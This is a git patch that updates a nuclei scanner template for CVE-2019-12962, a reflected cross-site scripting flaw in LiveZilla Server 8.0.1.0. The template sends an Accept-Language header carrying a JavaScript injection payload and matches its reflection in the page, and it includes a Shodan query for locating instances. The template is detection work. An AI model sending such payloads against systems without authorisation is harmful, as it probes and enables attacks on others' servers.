From 4798c1a14c215bf19902e0df88bf166028865c90 Mon Sep 17 00:00:00 2001
From: Prince Chaddha <prince@projectdiscovery.io>
Date: Mon, 9 May 2022 12:41:38 +0530
Subject: [PATCH] Update CVE-2019-12962.yaml

---
 cves/2019/CVE-2019-12962.yaml | 25 +++++++++++++++----------
 1 file changed, 15 insertions(+), 10 deletions(-)

diff --git a/cves/2019/CVE-2019-12962.yaml b/cves/2019/CVE-2019-12962.yaml
index 7146e09c23..9a2929fdc3 100644
--- a/cves/2019/CVE-2019-12962.yaml
+++ b/cves/2019/CVE-2019-12962.yaml
@@ -1,33 +1,38 @@
 id: CVE-2019-12962
 
 info:
-  name: LiveZilla Server 8.0.1.0 XSS
+  name: LiveZilla Server 8.0.1.0 - Cross Site Scripting
   author: Clment Cruchet
   severity: medium
-  description: LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
-  reference: https://www.exploit-db.com/exploits/49669
+  description: |
+    LiveZilla Server 8.0.1.0 - Accept-Language Reflected XSS
+  reference:
+    - https://www.exploit-db.com/exploits/49669
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-12962
+  metadata:
+    verified-by: dhiyaneshdk
+    shodan-query: http.html:LiveZilla
   tags: cve,cve2019,livezilla,xss
 
 requests:
   - method: GET
-    headers:
-      Accept-Language: ';alert(document.domain)//
     path:
       - '{{BaseURL}}/mobile/index.php'
+
+    headers:
+      Accept-Language: ';alert(document.domain)//'
     matchers-condition: and
     matchers:
-
       - type: word
-        words:
-          - "alert(document.domain)//"
         part: body
+        words:
+          - "var detectedLanguage = ';alert(document.domain)//';"
 
       - type: word
+        part: header
         words:
           - "text/html"
-        part: header
 
       - type: status
         status:
           - 200
-          
\ No newline at end of file